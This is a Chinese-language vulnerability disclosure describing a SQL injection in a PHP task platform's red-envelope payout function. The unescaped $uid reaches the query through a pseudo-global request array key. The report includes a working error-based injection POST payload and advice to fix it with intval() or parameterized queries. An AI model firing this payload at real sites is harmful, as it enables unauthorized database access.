### 简要描述: rt ### 详细说明: /www/lib/inc/CommonClass.php ``` public static function changehongbao($task_id,$moneys,$uid,$money,$title,$g) { $result=db_factory::get_one('select * from '.TABLEPRE.'witkey_space where uid='.$uid); if($g){ $newbalance=$result['balance']-$money+$moneys; db_factory::query('update '.TABLEPRE.'witkey_space set balance='.$newbalance.' where uid='.$uid); keke_finance_class::insert_trust("in", "task_xg", $uid, -$money+$moneys, $newbalance); }else{ $newbalance=$result['balance']+$money; keke_finance_class::insert_trust("in", "finish_task", $uid,$money, $newbalance,$task_id); db_factory::query('update '.TABLEPRE.'witkey_space set balance='.$newbalance.' where uid='.$uid); db_factory::query('update '.TABLEPRE.'witkey_space set is_hongbao=1 where uid='.$uid); db_factory::query('update '.TABLEPRE.'witkey_task_work set work_status=4 where uid='.$uid.' and task_id='.$task_id); } if(!$g){ $v_arr = array ( "红包任务" => '【'.$title.'】', "红包金额" => $money );...
### 简要描述: rt

### 详细说明:

/www/lib/inc/CommonClass.php

```
public static function changehongbao($task_id,$moneys,$uid,$money,$title,$g) {
    $result=db_factory::get_one('select * from '.TABLEPRE.'witkey_space where uid='.$uid);
    if($g){
        $newbalance=$result['balance']-$money+$moneys;
        db_factory::query('update '.TABLEPRE.'witkey_space set balance='.$newbalance.' where uid='.$uid);
        keke_finance_class::insert_trust("in", "task_xg", $uid, -$money+$moneys, $newbalance);
    }else{
        $newbalance=$result['balance']+$money;
        keke_finance_class::insert_trust("in", "finish_task", $uid,$money, $newbalance,$task_id);
        db_factory::query('update '.TABLEPRE.'witkey_space set balance='.$newbalance.' where uid='.$uid);
        db_factory::query('update '.TABLEPRE.'witkey_space set is_hongbao=1 where uid='.$uid);
        db_factory::query('update '.TABLEPRE.'witkey_task_work set work_status=4 where uid='.$uid.' and task_id='.$task_id);
    }
    if(!$g){
        $v_arr = array ( "红包任务" => '【'.$title.'】', "红包金额" => $money );
        keke_msg_class::notify_user($uid, $result['username'], 'select', '红包任务完成通知',$v_arr);
    }
    return true;
}
```

可以看到 uid 参数没有单引号包裹、也没有做整数强制转换或转义，就直接拼接进了查询语句，因此 $uid 是一个 SQL 注入点（最后一条 update 语句中的 $task_id 也是同样的拼接方式）。修复时应在拼接前对 $uid、$task_id 做 intval() 强制转换，或改用参数化查询，而不是仅仅加上引号。下面看看何处调用了这个方法。

/www/control/select.php

```
......
foreach ($cbk as $key => $val) {
    do {
        $lcg = lcg_value();
    } while ($lcg < 0.1);
    if (($key + 1) == $count) {
        $selefHongBao[$val] = $hongbaoSum;
    } else {
        $selefHongBao[$val] = number_format($lcg * $hongbaoSum, 2);
    }
    $hongbaoSum -= $selefHongBao[$val];
    $a += $selefHongBao[$val];
}
foreach ($selefHongBao as $k => $v) {
    CommonClass::changehongbao($task_id, $task_info[0]['task_cash'], $k, $v, $task_info[0]['task_title']);
}
CommonClass::changehongbao('', $task_info[0]['task_cash'], $gUid, $a, $task_info[0]['task_title'], 1);
.......
```

可以看到这里调用了 changehongbao()，其中传给 $uid 的 $k 来源于 $selefHongBao 数组的键名。然而这个程序是伪全局的（请求参数会被注册为同名变量），所以我们可以通过请求自行提供一个 $selefHongBao 的键名，它会原样作为 $uid 拼接进 SQL 语句。

http://localhost:801/index.php?do=select

post:

```
formhash=1&selefHongBao[111 and extractvalue(1,concat(0x5c,user()))]=1111&task_id=1
```

[<img src="https://images.seebug.org/upload/201509/17025134a4928d05c06ffa2ee2c745f70651870b.png" alt="22.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201509/17025134a4928d05c06ffa2ee2c745f70651870b.png)

### 漏洞证明:

[<img src="https://images.seebug.org/upload/201509/17025134a4928d05c06ffa2ee2c745f70651870b.png" alt="22.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201509/17025134a4928d05c06ffa2ee2c745f70651870b.png)